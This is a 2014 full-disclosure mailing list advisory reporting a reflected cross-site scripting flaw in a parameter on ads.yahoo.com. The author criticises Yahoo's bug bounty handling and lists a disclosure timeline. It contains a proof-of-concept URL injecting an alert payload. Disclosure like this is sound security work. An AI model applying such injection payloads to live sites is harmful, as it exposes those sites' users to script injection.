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Message-ID: <531AEFA7.5010605@t-online.de>
Date: Sat, 08 Mar 2014 11:23:35 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Yahoo Bug Bounty Program Vulnerability #1 XSS on
	ads.yahoo.com


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In Nov ?13 I reported a Cross-site Scripting vulnerability to the Yahoo
Bug Bounty Program. As for my other reports, I?ve got no response or
feedback,
so I wrote a message to them via email this time ... and so on ... blah
blah :)
 
To cut a long story short, for all my reports the communication with
Yahoo was really bad and of course: No bounty!

Advisory:                     Yahoo Bug Bounty Program Vulnerability #1
XSS on ads.yahoo.com
Advisory ID:                SSCHADV2013-YahooBB-001
Author:                        Stefan Schurtz
Affected Software:     Successfully tested on ads.yahoo.com
Vendor URL:                http://yahoo.com/
Vendor Status:           Seems to be fixed
Bounty:                       nothing
 
==========================
Vulnerability Description
==========================
 
The '_cbv'-Paramter on "http://ads.yahoo.com" is prone to a Cross-site
Scripting vulnerability
 
==========================
PoC-Exploit
==========================
 
http://ads.yahoo.com/st?ad_type=iframe&ad_size=300x250&site=1181425&section_code=112260532&
cb=1385497647.226089&publisher_blob=${RS}|gmGLFTE4OC4mbYnzUpH6dwEQOTMuMlKVBC__yxq4
|2143911627|LREC2|1385497647.226089&yud=smpv%3d3%26ed%3dzxE1dF31xQzMnXQidpJpWNtP
OVygJhcHBknzVCnpTraLTXtt8jO7OEVYpCbxEhJcwmU2x.ekTqffsDUVYgceDTs.NijijL.tGPKwsdRUsLvxftzYGe
.0VUghSSHioqjLjQJ7KaidIocpC1oj2SKC4lg_EhLiMsmgXiq6wbNVL_VzG1fHxP77ptF04VC7jL7lL1vr0iRs.r6
8cRSLiFUFzH_pvnaxUy8-&_msd=1&_xcf=1&_exv=RDnhGI4wnN7uv.jS65VPBVAFmZBbevIBHZGnRIl5vxDV&_msig=10sorm5kd&rmxbkn=0&_cbv=132025816&81c91"-alert(document.domain)-"1580bfdcb31=1

==========================
Disclosure Timeline
==========================

28-Nov-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Securiy Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response @ Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response @ Yahoo) //
last contact

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

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References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-001.txt
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